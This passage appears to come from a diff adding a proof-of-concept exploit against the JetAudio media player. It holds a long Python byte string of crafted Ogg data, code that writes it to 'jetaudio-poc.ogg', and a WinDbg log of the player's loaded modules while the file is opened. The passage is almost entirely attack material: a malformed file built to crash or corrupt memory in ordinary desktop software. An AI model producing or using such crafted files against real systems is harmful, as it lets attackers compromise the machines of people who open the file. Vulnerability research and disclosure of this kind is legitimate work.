9\xE6\xBF\x82\x92\x06\x92\xE0\xD7\x59\x92\xB8\x10\xB0\xCF\x63\xCC\xA5\xAA\x2A\x1C\x0E\x1F\x00\x00\x00\x00\x00\xEC\xCF\xEA\xA3\x9D\x1E\x85\xC4\xA8\xD9\x4E\xB9\x55\x99\x58\xA9\xBE\xAB\x76\x98\x79\xF5\xA6\x1A\x32\x19\x57\xD9\xD6\x57\xCB\xED\x53\x2E\x3E\x4D\xF7\x0A\x73\xAE\x91\xD7\x37\x1B\x28\xE9\xC4\xA7\x56\xFB\x31\x89\x2C\xBA\xBE\xF3\x5B\xCE\x96\x58\xB8\x2E\x2D\x5D\xE4\xDD\xB0\x38\xDE\x7C\x03\xF0\x5A\x8F\xEA\xF3\xD3\xE9\x2C\x5C\x0E\x78\x9C\xED\xBC\x7F\xE2\x9B\x58\x45\xEA\x3C\xA7\xEA\xE1\xF2\x4D\x1F\xE8\xC7\x92\x5B\xDB\xE1\xE3\xA9\xF3\xD6\x90\x4C\x7C\x73\x90\x9F\xEE\x54\x70\xDB\xBB\x4C\x2E\xCC\xF3\xAF\x75\xAF\xEA\xB6\xC9\xCC\xAA\xAC\x5A\x1E\xFF\x9F\x9D\xA9\x38\x24\xDE\x56\x9D\x49\xD7\x9D\xA2\x1A\xD5\x30\xBE\xFF\x12\x3F\x58\xBE\xEF\x9F\xAB\x59\x94\x11\x10\x4C\xAD\xB1\xF3\x5A\x88\x4B\xC4\xED\x06\x6A\x1C\xE7\x12\x06\xB5\xC2\x34\x2C\x5E\xCF\x4C\xE5\x66\x3E\x64\x26\xE5\x94\x28\x6C\xA7\x66\x9D\x9A\x31\x8C\x60\xCF\x79\x89\xFB\x8B\x6C\xA8\x6E\x31\x2D\x2F\x94\xA7\x33\x27\x9B\x21\x6D\xAE\x33\xF9\xEC\xEB\xD8\x08\x21\x21\x7C\x96\xDA\xC5\xB7\x9D\x8A\x51\x6F\xCC\xD5\x7E\x53\xB9\xEA\xD9\x77\x7C\x7B\xCF\x13\xD1\xB7\xC8\x77\x8F\x14\x43\x45\x9F\x85\x7B\xAA\xA8\x21\xFA\xA4\xCF\xE6\x0D\xF3\xB2\xE8\x4D\x13\x41\x00\xFE\xCB\x95\xC2\x45\xCD\xBF\x06\xB1\xFD\x32\x24\x8A\x1C\xCC\x65\x3A\x05\xF9\x9F\x01\x1C\x24\x8A\xAD\xF5\xBE\x6F\xC2\xB1\xCF\xAD\xF6\x59\xAD\xB2\xD1\xC9\x00\x00\x00\x00\x00\x69\x25\x8D\x17\x57\x5F\x87\xAF\x65\x6B\x46\x39\xE4\xDC\xAF\x72\xA7\x6B\x27\x21\x75\xD3\xF2\x96\x07\x13\xBD\xBB\x1D\xCE\xE7\xA1\xF1\x8A\x1F\xD9\x8E\x3D\xAF\x18\x8F\xA7\xC5\xE9\xCD\x39\x71\xBA\x96\x35\x07\x3B\x3D\x6F\xB9\xBB\x5E\x2C\x4E\x13\x71\xEE\x9D\x77\x93\xFE\xD7\x7B\x73\x42\xF4\xAF\x1A\x7E\x30\x13\x27\xF3\xFF\x88\x4B\xEA\xF1\x96\xF0\x39\x59\x05\xB7\xB6\xC9\x7D\xFE\xF1\x9C\x33\x6A\x82\xE6\xE4\x27\x34\x59\x49\x81\x2C\x98\xFD\x12\xA1\xDD\xD5\x79\xCC\x2E\x6B\x2A\x2B\x76\x1C\x23\x85\x50\x2F\xD9\xF4\xDD\xA7\x5F\xAD\x8D\x3A\xA2\xF8\xDA\x23\x58\x6B\x2E\x7C\xB8\xCA\xFB\xA5\x4D\xBA\x86\x6B\x77\x7D\xEC\xAF\x4F\xB3\x8
7\x83\x73\x38\xBD\x94\xAF\xD5\xB9\xF9\xB6\x71\xDD\x1B\x28\x60\xDC\x67\x47\xCC\xED\xC1\x24\x64\xAF\xD1\xCE\xC3\x94\x00\x6A\x1E\x3A\xA7\xA8\xD6\x7C\xCD\xE6\x70\x32\x67\x09\xFE\xFD\x52\xE7\x4E\xB5\xC8\xE2\x64\x51\x71\x4F\x56\xE2\x5D\xF3\xE2\x56\x77\xDB\x68\xB4\x0C\x32\x17\x91\x16\xB3\x75\x5F\xF4\xDE\x00\x1A\x2F\x77\xA6\xD3\x9F\x9F\x52\xEC\x25\xA3\xD3\x23\xE3\x0B\xD6\x8D\x64\xC2\x50\xA1\x43\x85\xA1\xDE\x84\x1C\x18\xD9\x16\x38\x00\x36\x9A\x0D\x40\x0E\xE6\x3F\x03\x92\x1B\xC9\xFA\x3A\xB5\x45\x44\x0D\xE6\x3F\x07\xC2\x44\xAA\xFD\x67\x1D\x79\xD1\xFA\x63\x4D\x62\x76\xF3\xF2\xD1\x38\x1C\x67\x77\x5B\x37\x4F\x9E\x71\x61\xCC\xC7\xCE\x8C\x58\xCE\xE7\x43\xC2\xDE\xB6\x59\xA3\xE5\xCA\x34\x3D\x17\x00\x00\x00\x00\x00\xA6\x0D\x6E\x36\xFA\xCF\xAC\x72\x63\x0F\xBA\xDB\xCE\x33\xB5\x5A\xCE\x3F\x99\x57\x7B\xA8\xBB\x38\x5F\x3A\xBC\x69\x9A\x93\x63\xEB\x6F\x59\x7C\x57\xBE\xF6\xAE\x97\xF6\xD7\xBF\x27\x1D\x79\x3C\x8C\xD2\x67\xD6\xF3\x35\xB8\xE0\xFE\xF1\x7A\xF1\xF5\xEA\x73\xEE\xF5\xFB\xD1\xEE\x5C\xE2\x93\xC7\x5D\x45\x9D\x5D\xD7\x8A\xB2\x81\xDD\x9B\x86\xDA\x4B\xD5\xD6\x00\xB5\x09\x8F\x2B\x4E\x7B\x20\x4B\x78\xAD\x35\xB9\xD5\xD3\xD5\xE7\x4B\x9B\x9E\xF3\x25\xAE\x47\xEA\xA8\xE0\xB1\xDF\x8F\x1A\x6D\x92\x8F\xB0\x3E\xFF\xC1\x8C\xE3\x6F\xA2\x08\x0A\x1F\xFC\x55\x1E\x0D\x5F\xD9\xAA\x8B\xCA\xCA\xCA\x4E\x9A\x66\xF3\x4B\x24\xE7\x26\x14\x63\x0D\x87\x81\xE7\x57\x7D\x55\xCF\x9D\x99\xD5\xF1\x35\x69\x2A\xEB\xF5\x7D\x4E\x36\x5D\x59\x2A\x86\x1A\xB6\x6A\x5D\x5B\xF0\x9A\x6C\x5B\xE7\xA3\xAA\xBD\x1C\x9F\x54\x0D\x1B\x20\xAD\x86\xDD\xEB\x7D\x9E\x2C\x24\xAA\x18\xB5\xC0\xE4\x93\xB9\xC9\x65\x22\x90\x29\x73\x4B\x8D\xBE\x2D\xA6\x23\x8B\x9D\xF0\xA6\xA4\xA6\x7D\x57\xA7\x7D\xBC\x5B\x08\x0B\x02\x6C\x49\x36\x72\xE8\x40\x86\x77\xCB\x7F\x0D\xFF\x2E\xBF\xCB\xB6\x90\x02\x51\x53\x0F\x15\xE3\xC9\x50\x41\x15\xB4\x72\x4B\x36\xE2\xA1\x46\xC7\x46\xBD\xB5\xDA\x94\x33\xA8\xED\x60\xF8\x01\xCC\x24\x20\x00\xB8\xDB\x07\x98\xED\xEF\xDB\x22\x81\xC3\xFE\xF2\xFC\xBA\x14\xFB\x1D\xCF\x06\xD7\xE3\xB8\xFC\x3D\x6F\xD0\xDE\xD0\x61\xFE\x1C\xAF\xB9\x72\xE3\xED\xC
2\xA2\xB8\xF6\x6E\x5E\x1A\xF8\xF0\xB5\x61\xFC\xD1\x06\xDC\x8A\x05\x35\xE6\xA5\x26\x07\xA9\xE2\x52\x8E\xFF\x84\xBA\x6E\xFE\x00\xDB\x2C\xC8\xEC\x89\x01\xC0\x83\x25\xC0\xF4\xA5\xD3\x70\xFC\xDF\x9C\xB9\xEB\x85\x25\xCA\x3D\xF1\xE1\x8A\x6E\xEB\xEB\x2F\xFC\x64\x53\xC6\x7A\x36\xE5\x9B\xE7\xBD\xE9\x9C\x67\xF2\xF2\xB8\x79\x79\x70\x72\xEF\x75\xAE\x07\x69\x89\x6E\x7F\xF9\x51\xE5\xA4\xDF\x02\x00\xAC\x5E\x23\xBF\x41\xCE\xDD\x99\xDA\x8D\x3C\x9D\x87\xFA\xD6\xB1\x7D\xD7\xA7\x75\xDB\xAC\xE5\x04\xE9\xB0\x1B\xC7\x0D\x3C\x55\x6D\x67\xDF\x9A\x9F\xEF\xBF\x74\x36\x77\x23\x1F\xEB\xB5\xF7\xEA\x9D\x6A\xAE\x9B\x6F\xD5\xDD\xB7\x65\xAF\xF7\x97\x16\x23\xDF\xD4\xC3\xA5\x73\xFB\x1F\x14\x79\xFC\xE2\x95\xBF\xB0\xD7\xA8\xC1\x92\x65\x3B\xDB\x3D\x1F\xF3\x45\x00\xC4\x76\x75\x39\xCC\xD4\xF4\x20\xD4\x3B\xE0\x23\xA6\xD4\x24\xFC\x03\xAC\xFB\x82\x8A\xE7\xDB\x93\x00\xFD\x1A\xC0\xB0\xDE\x9B\x2F\x5C\x47\x3F\x3D\x8F\xF1\xFF\x86\x5D\x6E\xBE\x7E\x8D\x17\x5F\x99\xD7\xF2\x3A\x18\xAC\x63\xD2\xFD\x1D\x1C\x3B\x4B\xA9\xFE\xA2\x6A\x4F\x1E\xFF\x8C\xEE\xD6\x48\xAA\xA2\x47\xE7\xDF\xBC\x2C\xB8\xF5\xA4\x03\x9A\x9A\x0D\xE1\x1C\xF4\x3F\x07\xC5\x44\x12\x5E\x68\xB6\x00\x52\xE0\xBF\x01\x23\x4C\x24\x91\xFB\x03\x00\xE4\x6B\xF1\xE1\xEC\xD1\xD9\xEC\x26\xA2\xDF\x04\xE7\xC9\x49\x9E\x74\xCA\x03\xCC\xFD\x38\xF6\xAA\xA0\xA5\x1B\x9E\x8C\x31\x55\x19\x00\x00\xC6\x44\x12\x21\x22\x76\x1B\xDC\x9E\xBF\xD3\x47\x0D\x39\xE5\xE5\xEB\xB3\xB8\xF4\xF5\x4B\xBF\xD2\x99\xEE\xD3\x71\x8F\xA6\xE1\xB8\x3D\x1B\x0D\x4A\x69\x8A\x97\xB6\xEB\x82\xB1\x62\x17\x35\xBD\x99\x1B\xA0\x59\xD8\xB4\x96\x30\x5A\x83\xB3\x67\x88\xCE\xB5\xD3\xB9\x57\x35\x86\x46\x13\x9D\xED\xE8\x59\xBA\xEB\xBE\x5A\x5A\x74\xD2\xBF\x2F\x2B\x66\x2B\xCF\xF1\x7D\x41\x7C\xCE\x9B\xC6\x2F\xD5\x59\xB3\x85\x7A\x34\xA3\xFD\x9E\xD8\x1E\xE9\xB5\x8E\xC6\x76\x40\x3B\x1D\xAE\xC7\xE5\x25\xDF\x7E\xF6\x62\x5B\xE0\xA0\xA6\xBB\x67\x49\xA2\x7D\xA3\x8B\x0D\x30\xFF\xFB\xFE\x9B\x83\xEA\x99\x02\x4D\xD4\x26\x92\xBA\x78\xC9\x17\xAD\x79\xBF\x58\x50\xCE\x1C\x9B\x2E\xCF\x6B\x91\xA8\x17\xD7\xAB\x9A\xDE\xCC\x28\x93\x33\xEF\x8D\xA
9\xBB\xDE\x4A\xBC\x75\x4A\xDE\x52\xE7\x49\x3F\x62\x26\xF8\xCC\x46\xB5\x49\xA0\xE1\xD7\x79\x89\x28\xFA\x12\x9B\xCE\x8D\x48\x98\x35\xBB\xF3\xFE\xEA\x9E\x36\x3D\x9B\xD9\xC9\x34\xD6\xDD\x0D\xB0\xBB\xA6\x99\x5C\x69\xD8\x7D\xC9\xDF\x19\x47\x20\x23\x61\xD9\x46\x16\xE8\x46\xC6\xD8\xC2\x13\x73\x8D\x6F\xF8\xFE\x76\x5A\xF8\xF9\x77\x77\xAD\x8B\x37\x73\x32\x95\xD5\x11\x38\x70\x7F\x60\xD9\x60\x1C\x5A\xC2\x0A\xE4\x3F\xC2\x96\x1D\xD0\x00\x0E\x98\x15\xC0\xF0\x1E\xC7\x82\xDE\x07\xD3\x85\x7C\x48\x2F\xF0\xC4\x31\xAD\xC4\xD1\x36\x40\x21\x08\x7E\xDB\x45\x20\x07\xF9\xAF\x81\xF2\x22\x59\x5B\xEF\x96\xC5\x18\xEC\xBF\x06\xC2\x46\x12\xFC\xBD\xFE\xB4\x57\x62\x2F\x7C\x03\x67\x94\xB0\xCF\x39\x6B\x6B\xA3\x32\x2D\x75\x61\x00\x00\x00\x00\x80\xC9\xFB\xD3\x63\x26\xEA\xE7\xC7\xB7\x5F\x5F\xA7\x06\x1B\x93\x7B\x0D\x87\xB3\x8D\xC9\x91\xB3\xDD\x5B\x75\x1D\xB7\x9B\x7E\x65\xA2\xDA\x3B\x48\x5A\x5E\x27\x9A\xB5\x95\x37\xBB\xAB\xF2\x97\xC7\x07\x85\x26\xE7\x68\xD5\x74\xCE\xC9\xB6\x4B\xE5\xF1\xBA\x0F\x44\x48\xB8\x27\xD4\xDD\xA9\x3C\xB2\xEE\x55\x4F\xDA\x6C\xFC\xCA\xDE\xCF\xB0\x32\x9F\x28\xD8\xE1\x97\xBF\xB4\x2B\xCF\x53\x35\xE7\x92\x1C\xBB\x39\xFA\xE5\xE5\xF8\x99\x07\xDC\x1B\x77\xBA\xA9\x0E\x89\xCE\xC2\xD9\xF7\x6F\xE7\xC1\x43\x47\x56\x9E\x99\x9D\x86\x86\x9F\x7A\xB4\x6F\xB9\x6F\x49\x40\x29\x87\xAB\xAF\x6E\x5A\xF5\x44\x53\x71\xF5\xF4\x94\xEF\xE6\xF9\x0F\x31\xE7\x7D\xE3\x55\xAA\xF1\xD8\x84\x76\x35\x67\x32\x6E\x4F\x96\x93\xA5\xCE\x8C\x47\x91\x14\x9F\x35\x7D\x0C\xEF\xC7\xD6\x90\xEC\x7A\xBD\x7B\x8C\x72\x98\xEE\xBB\x78\x3D\x4E\xD7\xCC\x54\xDD\xC5\x5E\x46\x9E\x8A\xFA\x2D\xB9\xE8\xE9\x5D\x95\xBD\x4D\xA8\x9D\x73\x66\x21\x2B\xD7\x76\xC2\x74\xB5\xF7\xDC\xBD\x9F\x29\x8E\x71\x63\xFF\x5B\x12\x9B\x76\x3D\x61\xF8\xB6\xBC\x35\x71\x34\x33\xBF\xFF\x35\x7F\xFE\x2C\x05\xB6\x04\x18\x02\xFF\x0B\xDF\xC2\xE0\x47\x96\x83\x50\x8A\x58\xC2\xD0\x37\xD3\x10\xC3\x14\x51\x15\x45\x01\x1E\x7C\xA5\xAE\x06\xF3\x9F\x05\xC2\x40\xAA\xFD\x6F\x56\x9A\x18\x93\xFD\xE7\x4C\x62\xD8\x48\xD6\xB7\xDA\xF4\x2C\xAC\x63\x8F\x4E\x37\x38\x3B\x55\x30\xDA\x9C\x35\x5A\x6E\x1
5\x23\xC7\xCE\x00\x00\x00\x00\x00\xE9\x98\x31\x45\xEF\x87\xEF\x67\xE5\xD9\x7A\x7B\xE5\x60\xBD\xB2\x79\x98\xCC\xE2\xEC\xEA\x6B\x97\xD9\xC5\xEA\x14\x2B\x4D\x87\x31\x7E\x30\x7B\xBC\xC7\xC5\xC2\x7E\x5A\x31\x7F\xFD\xB7\xE9\xD1\xA7\x2F\x35\x3C\x2E\xE8\x28\xA3\xAF\x33\x1F\x31\xDE\x38\x13\x3B\x7F\x82\xBE\x23\x9D\x3C\xBF\x08\x3A\xBF\x1E\x26\xA9\xDD\x7B\xD4\x0D\x3F\x1C\x3A\xEB\x86\xCA\xF2\x4D\x48\x71\xE7\xD2\xFE\x1F\x7B\xAC\x25\x55\x22\x97\xC6\xBF\xFB\xA1\x2B\x67\xE3\xEF\xCC\xAC\x2F\xBB\x2A\x35\xEA\xC2\xF8\xE5\xE9\xDE\x69\x7E\x9D\x70\xA2\xA2\x71\x57\xC2\x6C\xC2\xDF\xE2\xEB\x39\xC9\x87\xEC\xD2\x5E\x45\x1D\x53\x5F\xEE\xBF\x3C\x66\x1B\x83\xB5\x5D\x43\x41\xA9\xD9\xFB\x22\x7F\xBD\x70\x73\x25\xF4\xFA\xFE\xCA\xE8\x88\xED\x73\x2E\xB9\x9C\x64\xA7\xB3\x61\x89\x7B\xDF\x11\x44\x52\xDF\x7A\xDC\x92\xEC\x7C\xA2\x2B\x8F\x92\x5C\x9B\xCE\x21\x1F\xC8\xCC\x15\xEF\x53\xB0\x5B\xE5\x51\x5F\x18\x72\x0F\x89\x7F\x69\x59\x10\x58\x36\xF8\x58\x15\x11\x6D\x96\x8E\xDB\xEF\xCD\x38\xC6\xA7\xEF\xE7\xFE\x68\x61\x61\x26\x5E\x15\x11\x95\xC7\xA6\x29\x02\xA6\x8A\x20\x2A\xC6\x91\x88\xBE\x6D\x99\x68\xF8\x2F\xB0\x1C\x38\xB0\x6C\x09\x05\x00\xBE\xAB\x85\x2E\x47\xC8\xFF\x0C\x22\xED\x55\x91\x28\xF2\xAD\x16\x53\x17\xF8\xCF\x19\x30\x90\x78\xAB\x93\x33\x37\xFD\xFB\xB9\xDF\x25\x5C\x5A\x01\xDB\x9C\xFB\x29\xA0\xDC\x67\xAB\x24\x13\xD2\x77\x06\x00\x00\x00\x00\xD8\xC9\x3C\x93\x47\x63\xF7\x34\xFE\xCF\xCC\x36\xDE\xF0\x6B\xEF\xE1\x64\xC2\x28\x91\xE3\xC1\x69\x0E\xC5\x2B\x2D\x39\xB7\xAD\xEB\x6E\xB6\x66\x64\xD7\x2F\x96\xA7\xCB\x3A\xFD\xB5\xF3\xFD\xD5\x43\xF5\xB0\x8D\xBD\xA9\xFE\x31\xA3\xFB\xAF\x0E\xB4\x8A\x60\xC6\x5C\x1A\x5D\xC7\xC1\xDC\x72\x65\x22\x0B\x7C\xC4\xDE\x77\x96\x9F\xAD\xC9\xD3\x33\xDB\xF9\x1F\x3D\x8F\x9C\x49\xA7\xE7\xF5\xBB\x15\xCF\xBB\x93\xF3\x2C\x6D\xF3\x6F\x8C\x35\x97\xFC\x85\xFB\xCE\x1C\xAE\xE1\x92\xD4\xE3\xF1\x3B\x6C\xAC\xD9\xB3\xC2\xDD\xDD\x25\x4E\x37\x8B\xC4\x38\x86\xFB\xBE\xEF\x6B\xEB\x83\x59\xEF\xF9\x15\xE8\x61\xAA\x9A\x66\xB7\x5E\xB6\x2A\xC9\x5E\xFC\x29\x31\x4D\x49\x6F\x9F\x48\xA8\x74\x1D\xE5\xE4\xEB\x3F\x97\x23\xB
8\x17\x6C\x7E\xCA\x3F\x5C\xAA\xA4\xA7\x3C\x96\xBD\xF8\xFE\x74\x7F\xF0\xB7\xA9\x3D\x6D\x4D\xEF\x7D\xFF\x5C\x75\x8C\x2E\x7B\x36\x61\xB5\x30\x50\x11\xF0\xCB\x14\x64\x2D\x59\x3D\x9C\xA1\x7E\xEE\x1E\xCF\x90\x39\x4F\x6B\xD3\x1A\x26\x2B\xAC\xF6\x16\x2A\x26\x7A\xF3\xB6\xF5\xCD\x4B\xB0\x6F\x4E\x4B\x56\xEC\x3F\x72\x88\x25\x00\x59\x92\xC1\x96\xF4\x81\xE5\x2D\xD3\xDB\x67\x4B\x72\x53\x55\xCC\xDF\x31\xC4\xB0\xD7\x7B\x72\x33\xD4\x5F\xE4\xF0\xAF\xCF\x0E\x6D\x49\x78\x00\xBE\xAB\x85\x22\x46\xFD\xBF\x41\xC6\x56\x99\x53\xED\x67\xB5\x24\x4C\x71\xFD\x6F\x00\x03\xA9\xFE\x97\xC1\xB0\x76\x02\xA3\x8E\xD4\x29\xA0\xDA\x53\xAD\x72\x34\x7C\x30\x00\x8C\x30\x00\x00\x20\x72\x31\x5C\xFB\x63\x1B\xE5\xA9\x53\xFB\x75\x73\x54\x97\xDD\x6D\xB7\x36\x39\x36\xF5\x0B\xF1\xAE\x04\x0A\xDE\xF4\x91\x78\xC9\x51\xAF\xF1\x13\x6B\xF2\x95\x0F\xDB\x7B\x9F\x8C\xFD\xDF\x79\xF9\xE7\x0F\x07\xD9\x94\xCD\xEB\x94\xBA\xFD\xC7\xE4\xBA\xF6\xE7\xC1\x3C\x72\xAF\x8F\x8B\x33\x1E\x74\x72\x8B\x6C\xC5\x0F\x5D\xED\x93\x12\x1A\xFE\x77\xFF\xFB\xEA\xE4\xFD\x6D\x57\x33\xA6\x39\xD4\xA7\xC1\x65\x65\x73\xE5\x7F\x89\xCD\x66\x53\x03\xFB\x67\x15\x73\x95\x48\xF7\xA6\xE7\x79\x3A\xDD\x1C\x2D\xC7\xCF\x3C\xCE\xF1\xCC\xCC\xA9\xC7\xB9\x23\x1D\x39\x7C\x43\x64\xA9\x9B\x60\xA1\x7D\xF5\x4B\xC6\xDB\x05\x8C\xFC\xA5\xAC\x7B\x3C\x7D\xBE\xBE\xC9\x5B\x91\x71\xB3\x24\xBB\x8D\xEF\x3C\xEA\xDD\x47\x9E\xC8\xC9\x30\xF0\x9B\xA3\xBD\x16\x91\x48\xA2\x42\x4C\x6F\x42\xF5\x99\xCA\xA2\x12\xBA\xEE\xAE\x7D\x5E\x53\x9F\xF5\x01\x93\xC3\xE0\xEB\xA0\x15\x98\x33\x6A\xDD\x4F\x67\x67\x53\x00\x01\x00\x55\x00\x00\x00\x00\x00\x00\x55\x0B\x00\x00\x04\x00\x00\x00\x16\x3D\x35\xFD\x28\x46\xFF\x4C\xFF\x52\xFF\x4E\xFF\x6A\xFF\x53\x46\x51\x54\x53\x56\x52\x51\x58\x51\x52\x48\x44\x56\x54\x56\x56\x53\x58\x53\x51\x51\x56\x52\x57\x57\x55\x52\x57\x54\x3B\x0B\x66\x98\xFB\xBD\xAF\x64\x85\xD6\x55\x54\xFE\x7B\x37\xE0\x9C\x80\xCF\x62\x57\xBC\x6B\x61\xB2\xCC\xFF\xCA\xD2\x2F\x63\xD7\x28\x5C\x9E\xC7\x77\xA1\xDA\xBC\x9F\xFD\x42\x13\x9B\xA7\xA1\xA6\xAA\xA2\xE6\x49\xC5\x14\x11\x51\xC1\x90\xEF\x31\xB8\xFB\x58\x5
0\x70\x00\x10\x48\x00\x02\x3E\xCC\x65\xB1\x06\xFD\xCF\x81\x74\x33\x24\x0D"
+outfile = file("jetaudio-poc.ogg", 'wb')
+outfile.write(data)
+outfile.close()
+print "Created Poc"
+
+'''
+
+--------------------------------------------------------------------------------------------------------------------------
+
+windbg result:
+
+
+Microsoft (R) Windows Debugger Version 6.2.9200.16384 X86
+Copyright (c) Microsoft Corporation. All rights reserved.
+
+*** wait with pending attach
+Symbol search path is: *** Invalid ***
+****************************************************************************
+* Symbol loading may be unreliable without a symbol search path. *
+* Use .symfix to have the debugger choose a symbol path. *
+* After setting your symbol path, use .reload to refresh symbol locations. *
+****************************************************************************
+Executable search path is:
+ModLoad: 00400000 00b9b000 C:\Program Files\JetAudio\JetAudio.exe
+ModLoad: 7c900000 7c9af000 C:\WINDOWS\system32\ntdll.dll
+ModLoad: 7c800000 7c8f6000 C:\WINDOWS\system32\kernel32.dll
+ModLoad: 10000000 1000f000 C:\Program Files\JetAudio\JetCfg.dll
+ModLoad: 00ba0000 00c7d000 C:\Program Files\JetAudio\jdl_ximage.dll
+ModLoad: 7e410000 7e4a1000 C:\WINDOWS\system32\USER32.dll
+ModLoad: 77f10000 77f59000 C:\WINDOWS\system32\GDI32.dll
+ModLoad: 78520000 785c3000
+C:\WINDOWS\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.30729.4974_x-ww_d889290f\MSVCR90.dll
+ModLoad: 78480000 7850e000
+C:\WINDOWS\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.30729.4974_x-ww_d889290f\MSVCP90.dll
+ModLoad: 003a0000 003e8000 C:\Program Files\JetAudio\jdl_exif.dll
+ModLoad: 74ad0000 74ad8000 C:\WINDOWS\system32\POWRPROF.dll
+ModLoad: 77dd0000 77e6b000 C:\WINDOWS\system32\ADVAPI32.dll
+ModLoad: 77e70000 77f02000 C:\WINDOWS\system32\RPCRT4.dll
+ModLoad: 77fe0000 77ff1000 C:\WINDOWS\system32\Secur32.dll
+ModLoad: 77c10000 77c68000 C:\WINDOWS\system32\msvcrt.dll
+ModLoad: 77f60000 77fd6000 
C:\WINDOWS\system32\SHLWAPI.dll
+ModLoad: 789e0000 78d81000
+C:\WINDOWS\WinSxS\x86_Microsoft.VC90.MFC_1fc8b3b9a1e18e3b_9.0.30729.4974_x-ww_a96f9c14\mfc90u.dll
+ModLoad: 773d0000 774d3000
+C:\WINDOWS\WinSxS\X86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\COMCTL32.dll
+ModLoad: 76380000 76385000 C:\WINDOWS\system32\MSIMG32.dll
+ModLoad: 7c9c0000 7d1d7000 C:\WINDOWS\system32\SHELL32.dll
+ModLoad: 774e0000 7761d000 C:\WINDOWS\system32\ole32.dll
+ModLoad: 77120000 771ab000 C:\WINDOWS\system32\OLEAUT32.dll
+ModLoad: 76b40000 76b6d000 C:\WINDOWS\system32\WINMM.dll
+ModLoad: 771b0000 7725a000 C:\WINDOWS\system32\WININET.dll
+ModLoad: 77a80000 77b15000 C:\WINDOWS\system32\CRYPT32.dll
+ModLoad: 77b20000 77b32000 C:\WINDOWS\system32\MSASN1.dll
+ModLoad: 77c00000 77c08000 C:\WINDOWS\system32\VERSION.dll
+ModLoad: 76390000 763ad000 C:\WINDOWS\system32\IMM32.DLL
+ModLoad: 629c0000 629c9000 C:\WINDOWS\system32\LPK.DLL
+ModLoad: 74d90000 74dfb000 C:\WINDOWS\system32\USP10.dll
+ModLoad: 5ad70000 5ada8000 C:\WINDOWS\system32\UxTheme.dll
+ModLoad: 5d360000 5d36d000
+C:\WINDOWS\WinSxS\x86_Microsoft.VC90.MFCLOC_1fc8b3b9a1e18e3b_9.0.30729.4974_x-ww_19f00fd4\MFC90ENU.DLL
+ModLoad: 013f0000 01457000 C:\Program Files\JetAudio\JetCrash.dll
+ModLoad: 73000000 73026000 C:\WINDOWS\system32\WINSPOOL.DRV
+ModLoad: 02800000 028c1000 C:\Program Files\JetAudio\dbghelp.dll
+ModLoad: 74720000 7476c000 C:\WINDOWS\system32\MSCTF.dll
+ModLoad: 732e0000 732e5000 C:\WINDOWS\system32\RICHED32.DLL
+ModLoad: 74e30000 74e9d000 C:\WINDOWS\system32\RICHED20.dll
+ModLoad: 755c0000 755ee000 C:\WINDOWS\system32\msctfime.ime
+ModLoad: 76780000 76789000 C:\WINDOWS\system32\shfolder.dll
+ModLoad: 01780000 0178b000 C:\Program Files\JetAudio\JFEFFB3D.DLL
+ModLoad: 017b0000 017bb000 C:\Program Files\JetAudio\JFEFFBBE.DLL
+ModLoad: 017e0000 017eb000 C:\Program Files\JetAudio\JFEFFDRC.DLL
+ModLoad: 01810000 0181b000 C:\Program Files\JetAudio\JFEFFFX.DLL
+ModLoad: 01960000 0196d000 
C:\Program Files\JetAudio\JFEFFRVB.DLL
+ModLoad: 01990000 0199b000 C:\Program Files\JetAudio\JFEFFWID.DLL
+ModLoad: 019c0000 019cc000 C:\Program Files\JetAudio\JFEFFXB.DLL
+ModLoad: 019f0000 019fe000 C:\Program Files\JetAudio\JFEFFEQ.DLL
+ModLoad: 01aa0000 01b23000 C:\Program Files\JetAudio\JFEXRMC.DLL
+ModLoad: 76c30000 76c5e000 C:\WINDOWS\system32\WINTRUST.dll
+ModLoad: 76c90000 76cb8000 C:\WINDOWS\system32\IMAGEHLP.dll
+ModLoad: 72d20000 72d29000 C:\WINDOWS\system32\wdmaud.drv
+ModLoad: 72d10000 72d18000 C:\WINDOWS\system32\msacm32.drv
+ModLoad: 77be0000 77bf5000 C:\WINDOWS\system32\MSACM32.dll
+ModLoad: 77bd0000 77bd7000 C:\WINDOWS\system32\midimap.dll
+ModLoad: 76f50000 76f58000 C:\WINDOWS\system32\wtsapi32.dll
+ModLoad: 76360000 76370000 C:\WINDOWS\system32\WINSTA.dll
+ModLoad: 5b860000 5b8b5000 C:\WINDOWS\system32\NETAPI32.dll
+ModLoad: 02370000 02387000 C:\Program Files\JetAudio\JXCDMan.dll
+ModLoad: 028d0000 02b95000 C:\WINDOWS\system32\xpsp2res.dll
+ModLoad: 02610000 02618000 C:\Program Files\Internet Download
+Manager\idmmkb.dll
+ModLoad: 03280000 03288000 C:\Program Files\JetAudio\jdl_vorbisfile.dll
+ModLoad: 03290000 03296000 C:\Program Files\JetAudio\jdl_ogg.dll
+ModLoad: 03a80000 03c0c000 C:\Program Files\JetAudio\jdl_vorbis.dll
+ModLoad: 031a0000 03230000 C:\Program Files\JetAudio\JXVidInfo.dll
+ModLoad: 75a70000 75a91000 C:\WINDOWS\system32\MSVFW32.dll
+ModLoad: 71ad0000 71ad9000 C:\WINDOWS\system32\wsock32.dll
+ModLoad: 71ab0000 71ac7000 C:\WINDOWS\system32\WS2_32.dll
+ModLoad: 71aa0000 71aa8000 C:\WINDOWS\system32\WS2HELP.dll
+ModLoad: 76fd0000 7704f000 C:\WINDOWS\system32\CLBCATQ.DLL
+ModLoad: 77050000 77115000 C:\WINDOWS\system32\COMRes.dll
+ModLoad: 74810000 7497d000 C:\WINDOWS\system32\quartz.dll
+ModLoad: 73f10000 73f6c000 C:\WINDOWS\system32\dsound.dll
+ModLoad: 73ee0000 73ee4000 C:\WINDOWS\system32\KsUser.dll
+ModLoad: 7d790000 7d99b000 C:\WINDOWS\system32\wmvcore.dll
+ModLoad: 03dc0000 03e0f000 C:\WINDOWS\system32\DRMClien.DLL
+ModLoad: 
736b0000 736b7000 C:\WINDOWS\system32\msdmo.dll
+ModLoad: 7e1e0000 7e282000 C:\WINDOWS\system32\urlmon.dll
+ModLoad: 59a10000 59a4c000 C:\WINDOWS\system32\WMASF.DLL
+ModLoad: 4b320000 4b349000 C:\WINDOWS\system32\wmidx.dll
+ModLoad: 75cf0000 75d81000 C:\WINDOWS\system32\mlang.dll
+ModLoad: 75f40000 75f51000 C:\WINDOWS\system32\devenum.dll
